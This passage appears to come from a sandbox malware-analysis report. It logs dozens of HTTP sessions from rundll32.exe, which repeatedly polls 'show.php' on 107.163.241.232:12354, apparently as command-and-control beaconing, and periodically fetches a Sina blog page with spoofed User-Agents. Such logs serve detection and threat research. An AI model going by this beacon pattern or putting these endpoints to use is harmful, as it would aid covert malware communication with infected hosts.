                                              64 | 192.168.2.4 | 50244 | 202.108.0.52 | 80 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:24.780812979 CET | 214 | OUT | GET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
                                              Dec 11, 2024 16:25:26.400546074 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
                                              Server: nginx/1.2.8
                                              Date: Wed, 11 Dec 2024 15:25:26 GMT
                                              Content-Type: text/html
                                              Content-Length: 160
                                              Connection: keep-alive
                                              Location: https://blog.sina.com.cn/u/5655029807
                                              Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              65 | 192.168.2.4 | 50267 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:26.951982021 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              66 | 192.168.2.4 | 50270 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:27.070265055 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              67 | 192.168.2.4 | 50295 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:28.678448915 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              68 | 192.168.2.4 | 50298 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:28.835324049 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              69 | 192.168.2.4 | 50299 | 202.108.0.52 | 80 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:28.835434914 CET | 214 | OUT | GET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
                                              Dec 11, 2024 16:25:30.353166103 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
                                              Server: nginx/1.2.8
                                              Date: Wed, 11 Dec 2024 15:25:30 GMT
                                              Content-Type: text/html
                                              Content-Length: 160
                                              Connection: keep-alive
                                              Location: https://blog.sina.com.cn/u/5655029807
                                              Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              70 | 192.168.2.4 | 50321 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:30.939234972 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              71 | 192.168.2.4 | 50324 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:31.083494902 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              72 | 192.168.2.4 | 50356 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:32.681602955 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              73 | 192.168.2.4 | 50358 | 202.108.0.52 | 80 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:32.809689999 CET | 214 | OUT | GET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
                                              Dec 11, 2024 16:25:34.356770992 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
                                              Server: nginx/1.2.8
                                              Date: Wed, 11 Dec 2024 15:25:34 GMT
                                              Content-Type: text/html
                                              Content-Length: 160
                                              Connection: keep-alive
                                              Location: https://blog.sina.com.cn/u/5655029807
                                              Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              74 | 192.168.2.4 | 50359 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:32.810214996 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              75 | 192.168.2.4 | 50389 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:34.933986902 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              76 | 192.168.2.4 | 50392 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:35.039336920 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              77 | 192.168.2.4 | 50423 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:36.705670118 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              78 | 192.168.2.4 | 50429 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:36.823462963 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              79 | 192.168.2.4 | 50430 | 202.108.0.52 | 80 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:36.823565960 CET | 214 | OUT | GET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
                                              Dec 11, 2024 16:25:38.405175924 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
                                              Server: nginx/1.2.8
                                              Date: Wed, 11 Dec 2024 15:25:38 GMT
                                              Content-Type: text/html
                                              Content-Length: 160
                                              Connection: keep-alive
                                              Location: https://blog.sina.com.cn/u/5655029807
                                              Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              80 | 192.168.2.4 | 50467 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:38.943375111 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              81 | 192.168.2.4 | 50470 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:39.066222906 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              82 | 192.168.2.4 | 50500 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:40.767870903 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              83 | 192.168.2.4 | 50502 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:40.902616978 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              84 | 192.168.2.4 | 50503 | 202.108.0.52 | 80 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:40.902745008 CET | 214 | OUT | GET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
                                              Dec 11, 2024 16:25:42.474132061 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
                                              Server: nginx/1.2.8
                                              Date: Wed, 11 Dec 2024 15:25:42 GMT
                                              Content-Type: text/html
                                              Content-Length: 160
                                              Connection: keep-alive
                                              Location: https://blog.sina.com.cn/u/5655029807
                                              Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              85 | 192.168.2.4 | 50557 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:43.003683090 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              86 | 192.168.2.4 | 50563 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:43.160845041 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              87 | 192.168.2.4 | 50618 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:44.900798082 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              88 | 192.168.2.4 | 50622 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:45.010304928 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              89 | 192.168.2.4 | 50623 | 202.108.0.52 | 80 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:45.014164925 CET | 214 | OUT | GET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
                                              Dec 11, 2024 16:25:46.594037056 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
                                              Server: nginx/1.2.8
                                              Date: Wed, 11 Dec 2024 15:25:46 GMT
                                              Content-Type: text/html
                                              Content-Length: 160
                                              Connection: keep-alive
                                              Location: https://blog.sina.com.cn/u/5655029807
                                              Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              90 | 192.168.2.4 | 50687 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:47.158174038 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              91 | 192.168.2.4 | 50692 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:47.272820950 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              92 | 192.168.2.4 | 50748 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:48.896734953 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              93 | 192.168.2.4 | 50753 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:49.012020111 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              94 | 192.168.2.4 | 50754 | 202.108.0.52 | 80 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:49.012139082 CET | 214 | OUT | GET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
                                              Dec 11, 2024 16:25:50.583398104 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
                                              Server: nginx/1.2.8
                                              Date: Wed, 11 Dec 2024 15:25:50 GMT
                                              Content-Type: text/html
                                              Content-Length: 160
                                              Connection: keep-alive
                                              Location: https://blog.sina.com.cn/u/5655029807
                                              Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              95 | 192.168.2.4 | 50835 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:51.253005028 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              96 | 192.168.2.4 | 50837 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:51.424747944 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              97 | 192.168.2.4 | 50912 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:52.897680998 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              98 | 192.168.2.4 | 50919 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:53.009042978 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              99 | 192.168.2.4 | 50921 | 202.108.0.52 | 80 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:53.015444040 CET | 214 | OUT | GET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
                                              Dec 11, 2024 16:25:54.576371908 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
                                              Server: nginx/1.2.8
                                              Date: Wed, 11 Dec 2024 15:25:54 GMT
                                              Content-Type: text/html
                                              Content-Length: 160
                                              Connection: keep-alive
                                              Location: https://blog.sina.com.cn/u/5655029807
                                              Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              100 | 192.168.2.4 | 51045 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:55.157731056 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              101 | 192.168.2.4 | 51050 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:55.284895897 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              102 | 192.168.2.4 | 51141 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:56.924770117 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              103 | 192.168.2.4 | 51148 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:57.029735088 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              104 | 192.168.2.4 | 51149 | 202.108.0.52 | 80 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:57.031270981 CET | 214 | OUT | GET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
                                              Dec 11, 2024 16:25:58.597588062 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
                                              Server: nginx/1.2.8
                                              Date: Wed, 11 Dec 2024 15:25:58 GMT
                                              Content-Type: text/html
                                              Content-Length: 160
                                              Connection: keep-alive
                                              Location: https://blog.sina.com.cn/u/5655029807
                                              Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              105 | 192.168.2.4 | 51278 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:59.157171965 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              106 | 192.168.2.4 | 51284 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:25:59.275904894 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              107 | 192.168.2.4 | 51378 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:26:00.936731100 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              108 | 192.168.2.4 | 51386 | 107.163.241.232 | 12354 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:26:01.045604944 CET | 184 | OUT | GET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              109 | 192.168.2.4 | 51387 | 202.108.0.52 | 80 | 6644 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 11, 2024 16:26:01.045877934 CET | 214 | OUT | GET /u/5655029807 HTTP/1.1
